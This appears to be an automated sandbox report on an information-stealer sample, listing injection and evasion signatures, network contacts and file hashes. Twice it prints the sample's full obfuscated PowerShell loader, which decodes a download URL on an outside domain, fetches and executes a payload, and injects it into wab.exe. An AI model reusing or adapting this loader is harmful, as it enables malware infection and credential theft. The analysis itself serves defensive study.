N/A N/A N/A N/A

Detects executables referencing many email and collaboration clients. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many file transfer clients. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4352 set thread context of 2680 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3588 wrote to memory of 3376 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3588 wrote to memory of 3376 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3376 wrote to memory of 4584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3376 wrote to memory of 4584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3376 wrote to memory of 4352 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3376 wrote to memory of 4352 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3376 wrote to memory of 4352 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4352 wrote to memory of 3084 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4352 wrote to memory of 3084 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4352 wrote to memory of 3084 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4352 wrote to memory of 2680 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4352 wrote to memory of 2680 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4352 wrote to memory of 2680 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4352 wrote to memory of 2680 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4352 wrote to memory of 2680 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83858356d39e4457babbc4f7c370d60cfc7ef83d4c8899fba40936707984a811.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$aminosyrerne = 1;Function Tarn($Sphagnumen){$Colitoxemia=$Sphagnumen.Length-$aminosyrerne;$digtsamlingernesterately='Substring';For( $digtsamlingernes=5;$digtsamlingernes -lt $Colitoxemia;$digtsamlingernes+=6){$Andantinoers+=$Sphagnumen.$digtsamlingernesterately.Invoke( $digtsamlingernes, $aminosyrerne);}$Andantinoers;}function Bzer($Ranglesten101){ & ($Giverens) ($Ranglesten101);}$Sansningerne=Tarn 'UnlexMImplioAnastzUf,rbiBrne lS,aaslm.nagaOve,h/K,nsu5Pou.t. Eksp0Cambo Klve( NedbW OveriTzet nKrigsdbehagoFlleswHver,sGldel ShrimNHovedTGrouc ,emon1Argum0P,eje.Pho,a0Wrich;Are p DiscoWP.troiBlazonklver6 Inds4Patro;Efte. ,nnexDyrlg6Evang4,uali;woolh Navngr KaruvPrd.k:Pinde1 orfa2 Alfa1Harpi.Emuss0Forne)Em.ed LogikGDrun,ePreedcKvotekAll.noUu,dg/afear2Dayma0Lag,r1Lenti0Shrie0Digit1N.nex0Wom e1 Mine AfteF queri MothrPissoe saltfLaithoEventx Berb/Apoca1Wagon2Kursu1ev,lu.Apopl0Bethy ';$Rusgifte=Tarn 'EcuadU SangsKreereR.tarrObser-FlertAHypsogInak eSchranCephat U.in ';$Brnefonden215=Tarn 'Mum eh Nonlt,pinst ClaupFred.sFemme:Binde/ fare/Nig twFiffewMoniswPinet.BechaiTim rnMorbrn,yntho Afskv BangaKaneltRedegi remvDefaieFanfabSupe uOasthiSkorslFriordElektiTolngnForfjgHydats likoLogorlSwin,uchaett ConiiFenylo KefinFor,ns rthr. SortiStophnMilie/Dryp.wAmortpLyenc-Cen acOvercoNarkonDynamtDepreeTormenamountLand,/,nolduMaggap Gulll StavoVomeraAn.itd fremsSlud,/MlkeagForesrPensiaS.bfevGdskeiAfhugt Tilpy Tabt_alvirfPhospoSpoonrk.avem ReprsMinkf/ haanhSyndi/ St,udForel/ iffebKnur /ForfogFasan/A.triCAmbigrC,tecuErantrVinekeWhipsu ymbas,vera2 ecli3Cauda8Gambi. T.melPrin zColouhGlutt ';$Catapan245=Tarn 'Squam>Sempl ';$Giverens=Tarn 'In.eri Ins eKuldkx,krif ';$Forsrgernes='Retningsstabile';$Sengetjsskuffes = Tarn 'Mellee AuricTyde.hnons.oWahin hrow%scelpaSp ndpUnhisp DisndNoseladetect Ref aBilli%.irgi\Cargoe CathtSkopuhGooseiNybegcRognoiSippesDonatiBetonnskildgSuppr.BerygTLawy.oKandigOlymp Pynt&Uenga&Overv KundeeBeatecMyxoshGokaro A,ve Teri.tTrian ';Bzer (Tarn 'Lsel,$B elbgTheomlRederoK.detbF ugta AcrolDeput:Lew.nU,fterkG,imioAdempm Sph,pRiftelP loreShleptTeksttStukseRibon=Taske( relacRachimAllusd Marg Morti/TigercUnder Mech $ ntivSGejste mmen AvicgU dere Hur,tSemiej Gigsscatocs SkelkD.linuMon.cfAs igf expeeS.avns Barl)Mynte ');Bzer (Tarn 'galma$ RayagAkvarlSagfroBeffrb Aarea arual eli:P,ddeSDivettMand,ahenvitInt,oiUde.roMezainC.huir Intee yls=A,kiv$ Ta,iBPrevarAc.elnParageTrichf Ma.ko a cenKoombdN.uroeLibelnAcuae2R,ste1Outpu5P,ogr.C,kadsMetacpUne tl Aa.niFlitttNonpr(.sgar$ Ba.eCCe.soaimpert aandaEphympnissea.ypomnTi.mp2 Porc4Nunci5plumo) Inse ');$Brnefonden215=$Stationre[0];$Injurier= (Tarn 'Ne,er$ regug SpinlOrdreoLaurub IndoaKon,elPlebs:arbtrH,hariuNondimRap caPlastnTheopiUn,resLappetBackfeDise,rAffra=Mate Nr vayeRentrwVina,-MinusOSubcobDetacjDecreeB.rytcDi ettSprit BrystSDeaveyExtr,sBeneftap.eteMishamWhims.BilleNSiv.ieTyk,ttExtir.Pos,eWFallieMustyb ,dmiCPredilPsalmiSulpheFragan S ynt');$Injurier+=$Ukomplette[1];Bzer ($Injurier);Bzer (Tarn ' Indi$SvensHUnexpuDermam kadeaDiffunCo,ori LivesDiscrtUdsaleAarstrTikol.AfpilH.orlyeExtraaSptm.d .esse MasorK rens Taxw[ ntid$Se reR iaaru,ragrsResungwhortiCorpsfG,asstVitase Disc]Store=Frai $ UndeSStripaSpri n P oasPerson ,orfiMe,ron SidegSiau.eDeco rUteronKrysteZooph ');$delegatens=Tarn 'Undef$Kala,HU,deruStudimSejrsa FermnFiliciSmid.sGaffet Veste Re orSquam..eukeDNorm o Amphw SubvnJoinelS.illoprof a L.gedB,ahmFWa laiPupillGurshe Post(J,set$FlertB RelarExamin.eligetaarefSkl.eoa,dernPr.cldKopifeerfarnLi.it2trivi1Jager5 Jaw,,Etike$ AffaBEnolooBegl,rBvsendBoileePost lUns alAngiveNeedmtSupers Worm) Subs ';$Bordellets=$Ukomplette[0];Bzer (Tarn 'Jernb$Drejng Chatl Talio Ups.bStetha DiaplAngre:jordfLKoorda Bekoa L xasTermieTroldm Sj fe PatikWoonoaFore nBaggeiSprydsStillm NonceSunberHystesBevom= S,oh(,iswaTSt,mmeAnatesTelent Star- P acP PropaIbe.etAdlumhForni Dalem$GererB Mi,to Tr.grUnsnad RefleJol,hl synklSp rae I bltMelo,sMaksi) ette ');while (!$Laasemekanismers) {Bzer (Tarn 'Ssl n$,ypocgabsurl KlimoStudibinfana ovarlNedvu:PerisGBebrea BrynsSendetXanthrFlle.oCottoebeston anktP,alteNeutrrK.rtooRe,solSpygao Ch.lgTe stiLubcks YdertNonca=tileg$LammetAnn.crSammeuAndereVersi ') ;Bzer $delegatens;Bzer (Tarn ' FinaSPensitUnfloaOptiorSpraitHelse-ArbejSS,idslChifreAnt,meKnapspMarxi Medi4Etmaa ');Bzer (Tarn 'Aster$ robg G atlNutteo hydrbTimetaSnaksl Moso:Immu LMedieaInq.iaAfsejsRaptueYewsamTildneMal akAfs.eaafpronIns.riMot.rs.magemHarmeeSkjorrBort s Remo=Re.ts(CrossT StudeBogkasTiaa tMolek-GanglPRetroaHosiotPsilah .rek Resi$FactoBTo.icoHeniqrO.bytdprecoe G mml.rhanlSkov.eRignitgeomas Pa.d)Sam.e ') ;Bzer (Tarn ' u.re$EnspngDvblelCon.iobesmob.alypaalepolOutfo:Cap eH.olisu StersAnegrsTakkeiMitertI,baaese,in=Prfer$St.ofgGge alRestaoSambab RallaClintlProte:Dele FLamdaoUdfr,rSchenmT,arso Dj vdisostnAncesi Belvn psycg Skove.ontrrSheld+B fin+Hy,er% Jule$ InteS Pa,etRorsmaAllertAdminiScoggoPrecln DeterDeltae,onfo.Distrc Overoeskilu SubvnCompetSmoot ') ;$Brnefonden215=$Stationre[$Hussite];}$Undervisningspligt=319778;$Tekstblok=29552;Bzer (Tarn 'Ve.ti$Kine,gUnsigltamilo .shabUneq aT.xaclStato:AntifAF ihefTa.etb Ar haOpi igReprsnSvaliiProkinOpsergscr.peSublinFor a1Ironi0Norgi9Snery Sortk= Char PhoraG Si.dePolitt emi- OssiCSkyldoBomban.ambutSr ebeMacadn WeattOv,ra Visar$CorroBI,dero UnsarAu,undSk,ldeVe.belMickelUe,ige psilt Wea sKulmu ');Bzer (Tarn 'Srskr$UnwargMill,lStereo dovebNondea Ela.lNig.e:Vas.ekbar,toEarninphor s Sul,iStjkigDj,ven S,oraBrightndtesiS rgto leasntemp.elrkerrSpytosRever Pasta= Knev Saddu[DentiSa hamyLyskosDamentdanseeSlusemgloom.Otio C,uktioKlkkenRob.svperifeTorskrr,strtStaab]Kulan:Notep:BegrnFEfph rSmugro ,bonmFriorBSubela Per.s,nmise Sept6ar ou4ruds.SAmp lt Or srKnebliEpidenScaffgSkoli(Ine.f$FortrATrustfProclbm,eteaSidesgJeepenHoun,iFreesnBaldagF.brieCheffnHomek1Splor0 ompu9 Oari)S,abs ');Bzer (Tarn 'Strid$ho jsg T,pplSindro Ska.bTsemiaNeur,l.hlor:RafraMSubfoiDistalbi,dilMdeafczazena Pr dkEpiceeLochi Ne.kh=Aeros Ane,i[SinapS G ovy tieisCiseltRetsae nhedmSmirc.I.digTEmigreBesnrxPhenyt Horn.Hus,eE.rstanStyricMar,koRegurd Sim,iMatrin oldlgCrabe]Fo ke:bluff:S.altAParasSJakeyCFo etIPopolIBurro..isreGF uttef,uidtScoreS .etetRutsjrR ppoiat,einIndbagSanse(inten$Gri,lkRottooRussenSeminsDegraiDihydgPseudnSprogaUnpostOmkariE,otto Pr.onhent.eScr.tr TavesFortv)Modpo ');Bzer (Tarn ' Pa l$Udrivg ExcelSeraso KlorbJobbeaSideolUlovm: NongBHjemml,urenobologtTrochlKonfig,utuan SpotikldebnPaddog,rndeeTur onVagt =R pud$unpenMFr gtiBobbel P.etlOrdincVespiaCucu,k IncoeUrvrk.Haftos St,nu.agerbFarvesChristEmulgrRi,egi H,drnRefungDialy(Kat s$TrdepU CentnFillidforsheSmrbirIso,rvHestei Nosts Paa,nHudeniM,hamnVakangKva,rs E topKanerlWhosoiOverfgplumptPaa,i,Vest $Dele TEpileeForh.k.ensdsFot.ttArranbUdtvrlCon.io .atekIntro)Misin ');Bzer $Blotlgningen;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\ethicising.Tog && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$aminosyrerne = 1;Function Tarn($Sphagnumen){$Colitoxemia=$Sphagnumen.Length-$aminosyrerne;$digtsamlingernesterately='Substring';For( $digtsamlingernes=5;$digtsamlingernes -lt $Colitoxemia;$digtsamlingernes+=6){$Andantinoers+=$Sphagnumen.$digtsamlingernesterately.Invoke( $digtsamlingernes, $aminosyrerne);}$Andantinoers;}function Bzer($Ranglesten101){ & ($Giverens) ($Ranglesten101);}$Sansningerne=Tarn 'UnlexMImplioAnastzUf,rbiBrne lS,aaslm.nagaOve,h/K,nsu5Pou.t. Eksp0Cambo Klve( NedbW OveriTzet nKrigsdbehagoFlleswHver,sGldel ShrimNHovedTGrouc ,emon1Argum0P,eje.Pho,a0Wrich;Are p DiscoWP.troiBlazonklver6 Inds4Patro;Efte. ,nnexDyrlg6Evang4,uali;woolh Navngr KaruvPrd.k:Pinde1 orfa2 Alfa1Harpi.Emuss0Forne)Em.ed LogikGDrun,ePreedcKvotekAll.noUu,dg/afear2Dayma0Lag,r1Lenti0Shrie0Digit1N.nex0Wom e1 Mine AfteF queri MothrPissoe saltfLaithoEventx Berb/Apoca1Wagon2Kursu1ev,lu.Apopl0Bethy ';$Rusgifte=Tarn 'EcuadU SangsKreereR.tarrObser-FlertAHypsogInak eSchranCephat U.in ';$Brnefonden215=Tarn 'Mum eh Nonlt,pinst ClaupFred.sFemme:Binde/ fare/Nig twFiffewMoniswPinet.BechaiTim rnMorbrn,yntho Afskv BangaKaneltRedegi remvDefaieFanfabSupe uOasthiSkorslFriordElektiTolngnForfjgHydats likoLogorlSwin,uchaett ConiiFenylo KefinFor,ns rthr. SortiStophnMilie/Dryp.wAmortpLyenc-Cen acOvercoNarkonDynamtDepreeTormenamountLand,/,nolduMaggap Gulll StavoVomeraAn.itd fremsSlud,/MlkeagForesrPensiaS.bfevGdskeiAfhugt Tilpy Tabt_alvirfPhospoSpoonrk.avem ReprsMinkf/ haanhSyndi/ St,udForel/ iffebKnur /ForfogFasan/A.triCAmbigrC,tecuErantrVinekeWhipsu ymbas,vera2 ecli3Cauda8Gambi. T.melPrin zColouhGlutt ';$Catapan245=Tarn 'Squam>Sempl ';$Giverens=Tarn 'In.eri Ins eKuldkx,krif ';$Forsrgernes='Retningsstabile';$Sengetjsskuffes = Tarn 'Mellee AuricTyde.hnons.oWahin hrow%scelpaSp ndpUnhisp DisndNoseladetect Ref aBilli%.irgi\Cargoe CathtSkopuhGooseiNybegcRognoiSippesDonatiBetonnskildgSuppr.BerygTLawy.oKandigOlymp Pynt&Uenga&Overv KundeeBeatecMyxoshGokaro A,ve Teri.tTrian ';Bzer (Tarn 'Lsel,$B elbgTheomlRederoK.detbF ugta AcrolDeput:Lew.nU,fterkG,imioAdempm Sph,pRiftelP loreShleptTeksttStukseRibon=Taske( relacRachimAllusd Marg Morti/TigercUnder Mech $ ntivSGejste mmen AvicgU dere Hur,tSemiej Gigsscatocs SkelkD.linuMon.cfAs igf expeeS.avns Barl)Mynte ');Bzer (Tarn 'galma$ RayagAkvarlSagfroBeffrb Aarea arual eli:P,ddeSDivettMand,ahenvitInt,oiUde.roMezainC.huir Intee yls=A,kiv$ Ta,iBPrevarAc.elnParageTrichf Ma.ko a cenKoombdN.uroeLibelnAcuae2R,ste1Outpu5P,ogr.C,kadsMetacpUne tl Aa.niFlitttNonpr(.sgar$ Ba.eCCe.soaimpert aandaEphympnissea.ypomnTi.mp2 Porc4Nunci5plumo) Inse ');$Brnefonden215=$Stationre[0];$Injurier= (Tarn 'Ne,er$ regug SpinlOrdreoLaurub IndoaKon,elPlebs:arbtrH,hariuNondimRap caPlastnTheopiUn,resLappetBackfeDise,rAffra=Mate Nr vayeRentrwVina,-MinusOSubcobDetacjDecreeB.rytcDi ettSprit BrystSDeaveyExtr,sBeneftap.eteMishamWhims.BilleNSiv.ieTyk,ttExtir.Pos,eWFallieMustyb ,dmiCPredilPsalmiSulpheFragan S ynt');$Injurier+=$Ukomplette[1];Bzer ($Injurier);Bzer (Tarn ' Indi$SvensHUnexpuDermam kadeaDiffunCo,ori LivesDiscrtUdsaleAarstrTikol.AfpilH.orlyeExtraaSptm.d .esse MasorK rens Taxw[ ntid$Se reR iaaru,ragrsResungwhortiCorpsfG,asstVitase Disc]Store=Frai $ UndeSStripaSpri n P oasPerson ,orfiMe,ron SidegSiau.eDeco rUteronKrysteZooph ');$delegatens=Tarn 'Undef$Kala,HU,deruStudimSejrsa FermnFiliciSmid.sGaffet Veste Re orSquam..eukeDNorm o Amphw SubvnJoinelS.illoprof a L.gedB,ahmFWa laiPupillGurshe Post(J,set$FlertB RelarExamin.eligetaarefSkl.eoa,dernPr.cldKopifeerfarnLi.it2trivi1Jager5 Jaw,,Etike$ AffaBEnolooBegl,rBvsendBoileePost lUns alAngiveNeedmtSupers Worm) Subs ';$Bordellets=$Ukomplette[0];Bzer (Tarn 'Jernb$Drejng Chatl Talio Ups.bStetha DiaplAngre:jordfLKoorda Bekoa L xasTermieTroldm Sj fe PatikWoonoaFore nBaggeiSprydsStillm NonceSunberHystesBevom= S,oh(,iswaTSt,mmeAnatesTelent Star- P acP PropaIbe.etAdlumhForni Dalem$GererB Mi,to Tr.grUnsnad RefleJol,hl synklSp rae I bltMelo,sMaksi) ette ');while (!$Laasemekanismers) {Bzer (Tarn 'Ssl n$,ypocgabsurl KlimoStudibinfana ovarlNedvu:PerisGBebrea BrynsSendetXanthrFlle.oCottoebeston anktP,alteNeutrrK.rtooRe,solSpygao Ch.lgTe stiLubcks YdertNonca=tileg$LammetAnn.crSammeuAndereVersi ') ;Bzer $delegatens;Bzer (Tarn ' FinaSPensitUnfloaOptiorSpraitHelse-ArbejSS,idslChifreAnt,meKnapspMarxi Medi4Etmaa ');Bzer (Tarn 'Aster$ robg G atlNutteo hydrbTimetaSnaksl Moso:Immu LMedieaInq.iaAfsejsRaptueYewsamTildneMal akAfs.eaafpronIns.riMot.rs.magemHarmeeSkjorrBort s Remo=Re.ts(CrossT StudeBogkasTiaa tMolek-GanglPRetroaHosiotPsilah .rek Resi$FactoBTo.icoHeniqrO.bytdprecoe G mml.rhanlSkov.eRignitgeomas Pa.d)Sam.e ') ;Bzer (Tarn ' u.re$EnspngDvblelCon.iobesmob.alypaalepolOutfo:Cap eH.olisu StersAnegrsTakkeiMitertI,baaese,in=Prfer$St.ofgGge alRestaoSambab RallaClintlProte:Dele FLamdaoUdfr,rSchenmT,arso Dj vdisostnAncesi Belvn psycg Skove.ontrrSheld+B fin+Hy,er% Jule$ InteS Pa,etRorsmaAllertAdminiScoggoPrecln DeterDeltae,onfo.Distrc Overoeskilu SubvnCompetSmoot ') ;$Brnefonden215=$Stationre[$Hussite];}$Undervisningspligt=319778;$Tekstblok=29552;Bzer (Tarn 'Ve.ti$Kine,gUnsigltamilo .shabUneq aT.xaclStato:AntifAF ihefTa.etb Ar haOpi igReprsnSvaliiProkinOpsergscr.peSublinFor a1Ironi0Norgi9Snery Sortk= Char PhoraG Si.dePolitt emi- OssiCSkyldoBomban.ambutSr ebeMacadn WeattOv,ra Visar$CorroBI,dero UnsarAu,undSk,ldeVe.belMickelUe,ige psilt Wea sKulmu ');Bzer (Tarn 'Srskr$UnwargMill,lStereo dovebNondea Ela.lNig.e:Vas.ekbar,toEarninphor s Sul,iStjkigDj,ven S,oraBrightndtesiS rgto leasntemp.elrkerrSpytosRever Pasta= Knev Saddu[DentiSa hamyLyskosDamentdanseeSlusemgloom.Otio C,uktioKlkkenRob.svperifeTorskrr,strtStaab]Kulan:Notep:BegrnFEfph rSmugro ,bonmFriorBSubela Per.s,nmise Sept6ar ou4ruds.SAmp lt Or srKnebliEpidenScaffgSkoli(Ine.f$FortrATrustfProclbm,eteaSidesgJeepenHoun,iFreesnBaldagF.brieCheffnHomek1Splor0 ompu9 Oari)S,abs ');Bzer (Tarn 'Strid$ho jsg T,pplSindro Ska.bTsemiaNeur,l.hlor:RafraMSubfoiDistalbi,dilMdeafczazena Pr dkEpiceeLochi Ne.kh=Aeros Ane,i[SinapS G ovy tieisCiseltRetsae nhedmSmirc.I.digTEmigreBesnrxPhenyt Horn.Hus,eE.rstanStyricMar,koRegurd Sim,iMatrin oldlgCrabe]Fo ke:bluff:S.altAParasSJakeyCFo etIPopolIBurro..isreGF uttef,uidtScoreS .etetRutsjrR ppoiat,einIndbagSanse(inten$Gri,lkRottooRussenSeminsDegraiDihydgPseudnSprogaUnpostOmkariE,otto Pr.onhent.eScr.tr TavesFortv)Modpo ');Bzer (Tarn ' Pa l$Udrivg ExcelSeraso KlorbJobbeaSideolUlovm: NongBHjemml,urenobologtTrochlKonfig,utuan SpotikldebnPaddog,rndeeTur onVagt =R pud$unpenMFr gtiBobbel P.etlOrdincVespiaCucu,k IncoeUrvrk.Haftos St,nu.agerbFarvesChristEmulgrRi,egi H,drnRefungDialy(Kat s$TrdepU CentnFillidforsheSmrbirIso,rvHestei Nosts Paa,nHudeniM,hamnVakangKva,rs E topKanerlWhosoiOverfgplumptPaa,i,Vest $Dele TEpileeForh.k.ensdsFot.ttArranbUdtvrlCon.io .atekIntro)Misin ');Bzer $Blotlgningen;"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4092 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\ethicising.Tog && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 www.innovativebuildingsolutions.in udp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
US 8.8.8.8:53 98.58.21.103.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp

Files

memory/3376-0-0x00007FFA05573000-0x00007FFA05575000-memory.dmp

memory/3376-1-0x0000029BFED30000-0x0000029BFED52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2h1a5fcq.yb4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3376-11-0x00007FFA05570000-0x00007FFA06031000-memory.dmp

memory/3376-12-0x00007FFA05570000-0x00007FFA06031000-memory.dmp

memory/3376-13-0x00007FFA05570000-0x00007FFA06031000-memory.dmp

memory/3376-14-0x00007FFA05573000-0x00007FFA05575000-memory.dmp

memory/3376-15-0x00007FFA05570000-0x00007FFA06031000-memory.dmp

memory/4352-18-0x0000000004AC0000-0x0000000004AF6000-memory.dmp

memory/4352-19-0x00000000052D0000-0x00000000058F8000-memory.dmp

memory/4352-20-0x00000000051E0000-0x0000000005202000-memory.dmp

memory/4352-21-0x0000000005900000-0x0000000005966000-memory.dmp

memory/4352-22-0x0000000005970000-0x00000000059D6000-memory.dmp

memory/4352-32-0x0000000005B90000-0x0000000005EE4000-memory.dmp

memory/4352-33-0x00000000060A0000-0x00000000060BE000-memory.dmp

memory/4352-34-0x0000000006180000-0x00000000061CC000-memory.dmp

memory/4352-35-0x0000000007990000-0x000000000800A000-memory.dmp

memory/4352-36-0x00000000066B0000-0x00000000066CA000-memory.dmp

memory/4352-37-0x00000000073E0000-0x0000000007476000-memory.dmp

memory/4352-38-0x0000000007370000-0x0000000007392000-memory.dmp

memory/4352-39-0x00000000085C0000-0x0000000008B64000-memory.dmp

C:\Users\Admin\AppData\Roaming\ethicising.Tog

MD5 378d952dc2d926ae171fae5b67cc5e10
SHA1 45e58c20248765d52ed3ebf9b3f8923acf793c5e
SHA256 03c5a0bdba00f06681c1c34fb584ef80cf2901b789aee503a221456b20b942dc
SHA512 b177709a408f26bfc6a38a3763416477d34fb64f78e1a81c5a458849787737d6ea1e515933b88396f6107938203c654011f2e4b3b269c0b7b34d979310bf4e68

memory/4352-42-0x0000000008B70000-0x000000000ABE8000-memory.dmp

memory/2680-46-0x00000000010F0000-0x0000000002344000-memory.dmp

memory/2680-47-0x00000000010F0000-0x0000000001130000-memory.dmp

memory/3376-51-0x00007FFA05570000-0x00007FFA06031000-memory.dmp